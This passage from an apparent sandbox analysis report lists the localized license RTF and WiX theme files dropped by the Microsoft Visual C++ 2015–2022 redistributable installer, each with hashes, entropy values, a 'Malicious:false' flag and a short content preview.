                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset128 MS PGothic;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset134 SimSun;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67\f1 \f0\'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41\f1 \f0\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\f1\par..MICROSOFT VISUAL C++ 2015 - 2022 \f0\'83\'89\'83\'93\'83\'5e\'83\'43\'83\'80\f1\par..\b0\f0\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\'82\'cd\f2\'a1\'a2\f1 Microsoft Corporation\f2\'a3\'a8\f0\'82\'dc\'82\'bd\'82\'cd\'82\'a8\'8b\'71\'97\'6c\'82\'cc\'8f\'8a\'8d\'dd\'92\'6e\'82\'c9\'89\'9e\'82\'b6\'82\'bd\'8a\'d6\'98\'41\'89\'ef\'8e\'d0\f2\'a3\'a9\f0\'82\'c6\'82\'a8\'8b\'71\'97\'6c\'82\'c6\'82\'cc\'8c\'5f\'96\'f1\'82\'f0\'8d\'5c\'90\'ac\'82\'b5\'82\'dc\'82\'b7\f2\'a1\'a3\'b

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1041\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3959
                                                                        Entropy (8bit):5.955167044943003
                                                                        Encrypted:false
                                                                        SSDEEP:96:uDiTlDuB1n+RNmvFo6bnpojeTPk0R/vueX5OA17IHdGWz:5uB1+gD1DU4EdGE
                                                                        MD5:DC81ED54FD28FC6DB6F139C8DA1BDED6
                                                                        SHA1:9C719C32844F78AAE523ADB8EE42A54D019C2B05
                                                                        SHA-256:6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
                                                                        SHA-512:FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.. <Control Control="UninstallButton" X="270" Y="237" Width="120" Height="23"/>.. <Control Control="RepairButton" X="187" Y="237" Width="80" Height="23"/>.. .. <String Id="Caption">[WixBundleName] .......</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">..........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ............ ......... .........................

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1042\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):28393
                                                                        Entropy (8bit):3.874126830110936
                                                                        Encrypted:false
                                                                        SSDEEP:384:CuQibAmua4XatV1pMxlD1xzjxsZmfmzw4ezN7RQjyeqCBS96My7yNRylDSFrQv90:n4atZClDFsZuheqooMerJlQq/
                                                                        MD5:641D926354F001034CF3F2F3B0FF33DC
                                                                        SHA1:5505107FFF6CF279769A82510276F61EA18637AE
                                                                        SHA-256:3D4E9C165CBEAB829D608106F0E96450F839FFA8ADBD755F0B51867E89DA2AE0
                                                                        SHA-512:B0339664434B096ABC26D600F7657919EF3689B4E0FDFD4EDD8E479859A51EF51BE8F05FA43E25567FFD6C1C2BCC6EF0D7A857B6D666D264C7783BAD3A383D0E
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset129 Malgun Gothic;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\f0 \f1\'b6\'f3\'c0\'cc\'bc\'b1\'bd\'ba\f0 \f1\'b0\'e8\'be\'e0\'bc\'ad\f0\par..MICROSOFT VISUAL C++ 2015 - 2022 \f1\'b7\'b1\'c5\'b8\'c0\'d3\f0 \par..\b0\f1\'ba\'bb\f0 \f1\'b6\'f3\'c0\'cc\'bc\'b1\'bd\'ba\f0 \f1\'b0\'e8\'be\'e0\'c0\'ba\f0 Microsoft Corporation(\f1\'b6\'c7\'b4\'c2\f0 \f1\'b0\'c5\'c1\'d6\f0 \f1\'c1\'f6\'bf\'aa\'bf\'a1\f0 \f1\'b5\'fb\'b6\'f3\f0 \f1\'b0\'e8\'bf\'ad\'bb\'e7\f0 \f1\'c1\'df\f0 \f1\'c7\'cf\'b3\'aa\f0 )\f1\'b0\'fa\f0 \f1\'b1\'cd\'c7\'cf\f0 \f1\'b0\'a3\'bf\'a1\f0 \f1\'c3\'bc\'b0\'e1\'b5\'c7\'b4\'c2\f0 \f1\'b0\'e8\'be\'e0\'c0\'d4\'b4\'cf\'b4\'d9\f0 . \f1\'ba\'bb\f0 \f1\'b6\'f3\'c0\'cc\'bc\'b1\'bd\'ba\f0 \f1\'

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1042\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3249
                                                                        Entropy (8bit):5.985100495461761
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
                                                                        MD5:B3399648C2F30930487F20B50378CEC1
                                                                        SHA1:CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
                                                                        SHA-256:AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
                                                                        SHA-512:C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive | /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1045\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13352
                                                                        Entropy (8bit):5.359561719031494
                                                                        Encrypted:false
                                                                        SSDEEP:384:Pd0SEvKJ7P9yEw1VAOV/sHm/Iznc2wf6w2:8Jf/sHmAzcaX
                                                                        MD5:F140FD8CA2C63A861D04310257C1B1DB
                                                                        SHA1:7BF7EF763A1F80ECACA692908F8F0790A88C3CA1
                                                                        SHA-256:6F94A99072061012C5626A6DD069809EC841D6E3102B48394D522A0C2E3AA2B5
                                                                        SHA-512:A0BD65AF13CC11E41E5021DF0399E5D21B340EF6C9BBE9B1B56A1766F609CEB031F550A7A0439264B10D67A76A6403E41ABA49B3C9E347CAEDFE9AF0C5BE1EE6
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 POSTANOWIENIA LICENCYJNE DOTYCZ\f1\'a5CE OPROGRAMOWANIA MICROSOFT\par..\f0 MICROSOFT VISUAL C++ \f1\'8cRODOWISKO URUCHOMIENIOWE 2015-2022 \par..\b0\f0 Niniejsze postanowienia licencyjne stanowi\f1\'b9 umow\'ea mi\'eadzy Microsoft Corporation (lub, w zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jednym z podmiot\f0\'f3w stowarzyszonych Microsoft Corporation) a Licencjobiorc\f1\'b9. Postanowienia te dotycz\'b9 oprogramowania okre\'9clonego powy\'bfej. Niniejsze postanowienia maj\'b9 r\f0\'f3wnie\f1\'bf zastosowanie do wszelkich us\'b3ug i aktualizacji Microsoft dla niniejszego oprogramowania, z wyj\'b9tkiem tych, kt\f0\'f3rym tow

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1045\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3212
                                                                        Entropy (8bit):5.268378763359481
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
                                                                        MD5:15172EAF5C2C2E2B008DE04A250A62A1
                                                                        SHA1:ED60F870C473EE87DF39D1584880D964796E6888
                                                                        SHA-256:440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
                                                                        SHA-512:48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalator [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Czy na pewno chcesz anulowa.?</String>.. <String Id="HelpHeader">Instalator . Pomoc</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [katalog] - Instaluje, naprawia, odinstalowuje.. lub tworzy pe.n. lokaln. kopi. pakietu w katalogu. Domy.lnie jest u.ywany prze..cznik install...../passive | /quiet - Wy.wietla ograniczony interfejs u.ytkownika bez monit.w albo nie wy.wietla ani interfejsu u.ytkownika,.. ani monit.w. Domy.lnie jest wy.wietlany interfejs u.ytkownika oraz wszystkie monity...../norestart - Pom

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1046\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10956
                                                                        Entropy (8bit):5.086757849952268
                                                                        Encrypted:false
                                                                        SSDEEP:192:H2JR4ufWXXFA+YGRjHquAHHoKWCsGlHIpSDDvJRkYhaDznP3l7wLXiBpt32:WJ6ufB+Yc3AnoZCb5AGPQPCLQ72
                                                                        MD5:9A8D2ACF07F3C01E5CBC461AB932D85B
                                                                        SHA1:8781A298DCC14C18C6F6DB58B64F50B2FC6E338E
                                                                        SHA-256:27891EEC899BE859E3B4D3B29247FC6B535D7E836DEF0329111C48741EC6E701
                                                                        SHA-512:A60262A0C18E3BEF7C6D52F242153EBE891F676ED639F2DACFEBBAC86E70EEBF58AA95A7FE1A16E15A553C1BD3ECACCD8677EB9D2761CB79CB9A342C9B4252E2
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMOS DE LICEN\'c7A PARA SOFTWARE MICROSOFT\par..TEMPO DE EXECU\'c7\'c3O DO MICROSOFT VISUAL C++ 2015 - 2022 \par..\b0 Os presentes termos de licen\'e7a constituem um contrato firmado entre a Microsoft Corporation (ou, dependendo do local no qual voc\'ea esteja domiciliado, uma de suas afiliadas) e voc\'ea. Eles se aplicam ao software indicado acima. Os termos tamb\'e9m se aplicam a quaisquer servi\'e7os ou atualiza\'e7\'f5es da Microsoft para o software, exceto at\'e9 a extens\'e3o de que eles tenham termos diferentes.\par..\b SE VOC\'ca CONCORDAR COM ESTES TERMOS DE LICEN\'c7A, TER\'c1 OS DIREITOS INDICADOS ABAIXO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pn

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1046\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3095
                                                                        Entropy (8bit):5.150868216959352
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
                                                                        MD5:BE27B98E086D2B8068B16DBF43E18D50
                                                                        SHA1:6FAF34A36C8D9DE55650D0466563852552927603
                                                                        SHA-256:F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
                                                                        SHA-512:3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Instala..o</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Tem certeza de que deseja cancelar?</String>.. <String Id="HelpHeader">Ajuda da Instala..o</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [diret.rio - instala, repara, desinstala ou.. cria uma c.pia local completa do pacote no diret.rio. Install . o padr.o..../passive | /quiet - exibe a IU m.nima sem nenhum prompt ou n.o exibe nenhuma IU e.. nenhum prompt. Por padr.o, a IU e todos os prompts s.o exibidos...../norestart - suprime qualquer tentativa de reiniciar. Por padr.o, a IU perguntar. antes de reiniciar

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1049\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):31981
                                                                        Entropy (8bit):3.6408688850128446
                                                                        Encrypted:false
                                                                        SSDEEP:384:GdkM1I1EqW6aAHmxiTJrN6feZ78C7e5zoPqp007FsrmPx/1JRbnS0Yk4SYdIDtx2:Su4Mtg1S0YkjYWZM
                                                                        MD5:62229BE4447C349DF353C5D56372D64B
                                                                        SHA1:989799ED24913A0E6AE2546EE2A9A8D556E1CB3B
                                                                        SHA-256:1BB3FB55B8A13FA3BAFFFE72F5B1ED8B57A63BD4D8654BB6DC5B9011CE803B44
                                                                        SHA-512:FA366328C3FD4F683FDB1C5A64F5D554DE79620331086E8B4CCC2BFC2595B1FDED02CEC8AA982FCD8B13CC175D222AF2D7E2CD1A33B52F36AFD692B533FDBF13
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset204 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset0 Tahoma;}{\f3\fnil\fcharset204 Garamond;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang1049\'d3\'d1\'cb\'ce\'c2\'c8\'df \'cb\'c8\'d6\'c5\'cd\'c7\'c8\'c8 \'cd\'c0 \'cf\'d0\'ce\'c3\'d0\'c0\'cc\'cc\'cd\'ce\'c5 \'ce\'c1\'c5\'d1\'cf\'c5\'d7\'c5\'cd\'c8\'c5 MICROSOFT\par..\'d1\'d0\'c5\'c4\'c0 \'c2\'db\'cf\'ce\'cb\'cd\'c5\'cd\'c8\'df MICROSOFT VISUAL C++ 2015\f1\endash\f2 2022 \par..\b0\f0\'cd\'e0\'f1\'f2\'ee\'ff\'f9\'e8\'e5 \'f3\'f1\'eb\'ee\'e2\'e8\'ff \'eb\'e8\'f6\'e5\'ed\'e7\'e8\'e8 \'ff\'e2\'eb\'ff\'fe\'f2\'f1\'ff \'f1\'ee\'e3\'eb\'e0\'f8\'e5\'ed\'e8\'e5\'ec \'ec\'e5\'e6\'e4\'f3 \'ea\'ee\'f0\'ef\'ee\'f0\'e0\'f6\'e8\'e5\'e9 Microsoft (\'e8\'eb\'e8, \'e2 \'e7\'e0\'e2\'e8\'f1\'e8\'ec\'ee\'f1\'f2\'e8 \'ee\'f2 \'ec\'e5\'f1\'f2\'e0

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1049\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4150
                                                                        Entropy (8bit):5.444436038992627
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
                                                                        MD5:17C652452E5EE930A7F1E5E312C17324
                                                                        SHA1:59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
                                                                        SHA-256:7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
                                                                        SHA-512:53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.... <String Id="Caption">......... ......... [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">....... .. .........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [.......] - ........., .............., ........ ..... ........ ...... ......... ..... ...... . ......... .. ......... - ............../passive | /quiet - ........... ....

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1055\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13807
                                                                        Entropy (8bit):5.2077828423114045
                                                                        Encrypted:false
                                                                        SSDEEP:192:mfGSPTe1VWjPqkdUxtptACpt4jSzUQBtB7+fzCCnebZ/42W2TEAQjE4oOwuxqrEs:7SK+W6UbACp2SzD9+btebZwZWEdpow2
                                                                        MD5:9625F3A496DBF5E3E0D2F33D417EDBBF
                                                                        SHA1:119376730428812A31B70D58C873866D5307A775
                                                                        SHA-256:F80926604E503697247353F56856B31DE0B3FC1319F1C94068363952549CC9B1
                                                                        SHA-512:DB91A14FC27E3A62324E024DD44E3B5548AF7E1C021201C3D851BD2F32537885AACFC64ADAE619BAC31B60229D1D5FC653F5301CD7187C69BD0ACECCE817D6A3
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset238 Garamond;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT YAZILIMI L\f1\u304?SANS KO\'aaULLARI\par..\f0 MICROSOFT VISUAL C++ 2015 - 2022 \'c7ALI\f1\'aaMA S\f0\'dcRESI \par..\b0 Bu lisans ko\f1\'baullar\u305?, Microsoft Corporation (veya ya\'baad\u305?\u287?\u305?n\u305?z yere g\f0\'f6re bir ba\f1\u287?l\u305? \'bairketi) ile sizin aran\u305?zda yap\u305?lan s\f0\'f6zle\f1\'bameyi olu\'baturur. Bu ko\'baullar, yukar\u305?da ad\u305? ge\f0\'e7en yaz\f1\u305?l\u305?m i\f0\'e7in ge\'e7erlidir. \f1\'aaartlar, yaz\u305?l\u305?m i\f0\'e7in t\'fcm Microsoft hizmetleri veya g\'fcncelle\f1\'batirmeleri i\f0\'e7in, beraberlerinde farkl\f1\u305? \'baartlar bulunmad\u305?\u287?\u305? s\f0\'fcrece ge\'e7erlidir.\pa

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1055\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3221
                                                                        Entropy (8bit):5.280530692056262
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
                                                                        MD5:DEFBEA001DC4EB66553630AC7CE47CCA
                                                                        SHA1:90CED64EC7C861F03484B5D5616FDBCDA8F64788
                                                                        SHA-256:E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
                                                                        SHA-512:B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Kurulumu</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.ptal etmek istedi.inizden emin misiniz?</String>.. <String Id="HelpHeader">Kurulum Yard.m.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [dizin] - y.kler, onar.r, kald.r.r ya da.. dizindeki paketin tam bir yerel kopyas.n. olu.turur. Varsay.lan install de.eridir...../passive | /quiet - en az d.zeyde istemsiz UI g.sterir ya da hi. UI g.stermez ve.. istem yoktur. Varsay.lan olarak UI ve t.m istemler g.r.nt.lenir...../norestart - yeniden ba.lama denemelerini engeller. Varsay.lan olarak UI yeniden ba.l

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\2052\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18214
                                                                        Entropy (8bit):3.9837154113926356
                                                                        Encrypted:false
                                                                        SSDEEP:192:Hom4PyAjs/HBJ5qyK3PG4lk5xxKyAW1yW7/Y3OKchGMvGMLdo4+uHq9f4yPxrdCX:IDM1OR5rGU2
                                                                        MD5:D083C7E300928A0C5AEA5ECBD1653836
                                                                        SHA1:08F4F1F9F7DFA593BE3977515635967CE7A99E7A
                                                                        SHA-256:A808B4933CE3B3E0893504DBEF43EBF90B8B567F94BD6481B6315ED9141E1B11
                                                                        SHA-512:8CB3FFAD879BABA36137B7A21B62D9D6C530693F5E16FBB975F3E7C20F1DB5A686F3A6EE406D69B018AA494E4CD185F71B369A378AE3289B8080105157E63FD0
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 Microsoft \f1\'c8\'ed\'bc\'fe\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0\f1\'d5\'e2\'d0\'a9\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\'ca\'c7\f0 Microsoft Corporation\f1\'a3\'a8\'bb\'f2\'c4\'fa\'cb\'f9\'d4\'da\'b5\'d8\'b5\'c4\f0 Microsoft \f1\'b9\'d8\'c1\'aa\'b9\'ab\'cb\'be\'a3\'a9\'d3\'eb\'c4\'fa\'d6\'ae\'bc\'e4\'b4\'ef\'b3\'c9\'b5\'c4\'d0\'ad\'d2\'e9\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'ca\'ca\'d3\'c3\'d3\'da\'c9\'cf\'ca\'f6\'c8\'ed\'bc\'fe\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'d2\'b2\'ca\'ca\'d3\'c3\'d3\'da\'d5\'eb\'b6\'d4\'b8\'c3\'c8\'ed\'bc\'fe\'b5\'c4\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'ce\'f1\'bb\'f2\'b8\'fc\'d0\'c2\'a3\'ac\'

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\2052\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2978
                                                                        Entropy (8bit):6.135205733555905
                                                                        Encrypted:false
